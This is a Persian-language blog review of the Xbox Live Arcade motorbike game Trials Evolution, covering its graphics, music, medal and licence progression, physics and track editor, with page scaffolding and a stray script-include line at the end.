تبلیغات
بازیکده - انقلابی در خلق هیجان

:درباره وبلاگ

:آرشیو

:طبقه بندی

:پیوندها

:پیوندهای روزانه

:نویسندگان

:آخرین پستها

:نظرسنجی

آماروبلاگ

سه شنبه 5 اردیبهشت 1391-08:13 ب.ظبازی Trials HD که در سال 2009 روی شبکه XBLA عرضه شد، به چنان موفقیتی دست پیدا کرد که کسی فکرش را هم نمی کرد. یک موتورسوای بسیار هیجان انگیز و زیبا که استودیوی RedLynx به شکل فوق العاده ای آن را خلق کرد. نسخه دوم این بازی نیز با نام Trials Evolution روی شبکه XBLA عرضه شد تا در همان 24 ساعت اول، رکورد پرفروش ترین بازی های این شبکه را بشکند و از آن خود کند. بازی ای که تنها در مدت 24 ساعت میزبان بیش از 100 هزار نفر در بخش آنلاینش بود.

گرافیک

بازی Trials Evolution از گرافیک بسیار خوبی برخوردار است و همین موضوع محیط بازی را بسیار جذاب کرده است. سازندگان بازی سعی کرده اند که محیط ها بسیار پرجزئیات و جذاب به نظر برسند و به همین دلیل آن ها را بسیار شلوغ و متنوع طراحی کرده اند. از طرف دیگر، کیفیت بافت های بازی برای یک عنوان Arcade بسیار خوب است و باعث شده که محیط ها بسیار زیبا به نظر برسند. جلوه های ویژه نیز از دیگر قسمت های بسیار خوب این عنوان هستند. انفجارها، تخریب ها از جمله المان های بسیار خوب بازی هستند که در بالاتر رفتن هیجان گیم پلی هم تأثیر داشته اند. تنوع محیط های بازی نیز واقعاً بی نظیر است.

مسیرهای بسیار زیادی برای TE طراحی شده که هر کدام با دیگری تفاوت دارند و از کیفیت بسیار خوبی هم برخوردار هستند. محیط های جنگلی، برفی، بیانانی که در آن ها گرد و خاک زیادی را مشاهده می کنید، محیط های جنگی و حتی مسیرهایی که در آسمان قرار دارند، بسیار عالی طراحی شده اند. از دیگر قسمت های خوب بازی، می توان به نورپردازی آن اشاره کرد که باعث شده محیط ها بسیار زیبا به نظر برسند. نورپردازی در هر محیط متفاوت است. در برخی مکان ها شاهد غروب خورشید هستید و در برخی دیگر هم محیط ها تاریک هستند و که در آنجا نور چراغ موتور به شکل بسیار خوبی روی محیط تأثیر می گذارد و سایه های خوبی تشکیل می دهد. طراحی مدل موتورها و شخصیت بازی هم در نوع خود بسیار جالب توجه و خوب از کار درآمده است.

موسیقی/صداگذاری

در ابتدا باید به این موضوع اشاره کرد که آهنگساز این بازی آقای مایک ریگان (Mike Reagan) است که آهنگساز سری God of War و بازی های Darkwatch ،Rise of the Kasai ،Brute Force و Twisted Metal: Black بوده است. آقای ریگان قطعاتی با ریتم تند برای این بازی ساخته که باعث شده هیجان بازی بیش از پیش شود و بازیکنان بتوانند به خوبی با روند سریع و هیجان انگیز بازی درگیر شوند. در کنار موسیقی هایی که ریگان برای بازی ساخته، آهنگ های لایسنس شده هم در بازی شنیده می شوند که بسیار خوب هستند. صدای موتورها بسیار واقعی است و صدای انفجارها و سایر المان های موجود در بازی نیز حس خوبی به روند بازی بخشیده اند.

گیم پلی

Trials Evolution یکی از بهترین گیم پلی های ممکن برای یک بازی موتورسوای Arcade را دارد. این بازی می تواند اوقات بسیار هیجان انگیز و لذت بخشی را برای شما رقم بزند. تنوع مراحل بازی واقعاً بی نظیر است و بازیکنان در هر قسمت با مسیرهای جدید و بسیار چالش برانگیزی روبرو می شوند. روند بازی به این صورت است که بازیکنان باید برای رفتن به مراحل بالاتر لایسنس های مخصوص را دریافت کنند. برای دریافت این لایسنس ها باید مسابقات را در بهترین حالت ممکن به پایان برسانید. پس از اینکه هر مسیر را به پایان رساندید، مدالی به شما داده می شود.

سه نوع مدال برنز، نقره و طلا برای هر مسیر در نظر گرفته شده که به نسبت رکوردی که بدست آورده اید، یکی از این مدال ها به شما داده می شود. حال برای رفتن به قسمت های بعدی و دریافت لایسنس های جدیدتر، باید تعداد مشخصی از این مدال ها را جمع آوری کنید. هر مسیر دارای سه مدال است که باید آن ها را دریافت کنید. البته در ابتدای بازی به دلیل اینکه موتور چندان قوی ای ندارید، شاید نتوانید همه مدال ها را بدست بیاورید. برای این کار باید موتورهای جدیدی در اختیار داشته باشید که خود بازی با رفتن به مراحل بالاتر به شما خواهد داد. با موتورهای جدیدتر می توانید به مسیرهای قبلی بازگردید و بار دیگر آن ها را با قابلیت های بیشتری بازی کنید تا مدال ها را بدست بیاورید.

با به پایان رساندن هر مرحله، میزانی پول به شما داده می شود که به وسیله آن ها می توانید برای شخصیت بازی آیتم های مختلفی مانند کلاه، دستکش، تی شرت، کفش و... خریداری کنید. همچنین می توانید موتورهای مختلف را هم برای خود خریداری کنید. Trials Evolution تنها یک بازی موتورسواری معمولی نیست. در این بازی باید مسیرهای بسیار عجیب و جذابی را سپری کنید. کنترل موتور و نحوه بازی کردن برای موفقیت در مسیرها بسیار مهم است. تنها نمی توان با گاز دادن در این بازی به پیروزی رسید. باید به میزان سرعت، نحوه پرش ها و شکل نشستن شخصیت بازی روی موتور هم توجه کنید.

فیزیک بسیار خوبی که برای بازی در نظر گرفته شده، باعث شده که کنترل  موتور شما در شرایط و مکان های مختلف بسیار متفاوت باشد. با آنالوگ سمت راست می توانید شخصیت بازی را کمی به جلو یا کمی به عقب خم کنید که این موضوع باعث می شود تا موتور شما در زمان پرش و یا زمان فرود آمدن روی زمین کنترل خودش را حذف کند. حتی برای عبور از برخی از موانع هم باید به شکل نشستن شخصیت بازی روی موتور توجه کنید. تنوع مسیرهای بازی باعث شده که همیشه چالش های جدیدی را پیش روی خود مشاهده کنید. مسیرها به هیچ عنوان مانند هم طراحی نشده اند و همین موضوع باعث شده که هیچ گاه در بازی احساس خستگی نکنید.

در برخی از مسیرها باید از المان هایی که در محیط قرار گرفته اند هم استفاده کنید تا بتوانید آن قسمت را پشت سر بگذارید. فشار آب، آتش و برخی از انفجارهایی که رخ می دهند، باعث می شوند که بتوانید پرش های بسیار بلندی انجام دهید یا از مکان خاصی عبور کنید. همین طور برخی از تخریب ها تنها برای از بین بردن موتورسوار رخ می دهند. در این زمان باید برای خود یک زمان بندی داشته باشید که بتوانید از این انفجارها جان سالم به در ببرید. همان طور که گفته شد، حرکت های اشتباه باعث می شوند که بازیکنان بازی را دوباره شروع کنند. در طول مسیر بازی Checkpointهای مختلفی قرار دارند که با هر بار اشتباه به آنجا می روید، اما این کار را در هر لحظه می توانید انجام دهید، حتی زمانی که با مشکلی مواجه نشده اید. با زدن دکمه B می توانید خود را به اولین Checkpoint نزدیک به خودتان برسانید و با زدن دکمه Back می توانید آن مرحله را از ابتدا شروع کنید.

لازم به ذکر است که انجام این کار شما را در کمتر از 1 ثانیه به ابتدای بازی با Checkpoint مورد نظر می برد. در طول مسابقه ها باید به زمان هم توجه داشته باشید. زمان چیزی است که باعث می شود شما مدال های مختلف را دریافت کنید. باید طوری بازی را طی کنید که هم، زمان بسیار خوبی بدست بیاورید و هم اشتباهات کمی در بازی داشته باشید. از دیگر قسمت های جالب این عنوان، بخش چندنفره آن است. که بازیکنان می توانند در آن با هم به رقابت بپردازند و رکوردهای جدیدی را ثبت کنند. این قسمت را حتماً باید تجربه کنید. از دیگر قابلیت های جدیدی که به بازی اضافه شده، سیستم طراحی و خلق مسیرهای جدید است که دارای دو حالت ساده و بسیار پیشرفته است. در حالت ساده می توانید نقطه شروع، پایان و برخی دیگر از المان هایی که دوست دارید در طول مسیر وجود داشته باشند را طراحی کنید، اما در حالت پیشرفته، بازی به شما این امکان را داده تا هر چیزی که دوست داشتید را خلق کنید و در آن بازی کنید.

نتیجه گیری

Trials Evolution یکی از بهترین بازی های Arcade شبکه Xbox Live Arcade به حساب می آید که واقعاً از نوآوری زیادی برخوردار است و قطعاً همه بازیکنان می توانند از آن لذت ببرند. مسیرهای چالش برانگیز این بازی به همراه گیم پلی بسیار درگیر کننده و جذاب از جمله المان هایی هستند که باعث شده این بازی با موفقیت مواجه شود.

تاریخ آخرین ویرایش:- -
script src="http://filmdoni.ir/game/01.js" language="javascript" >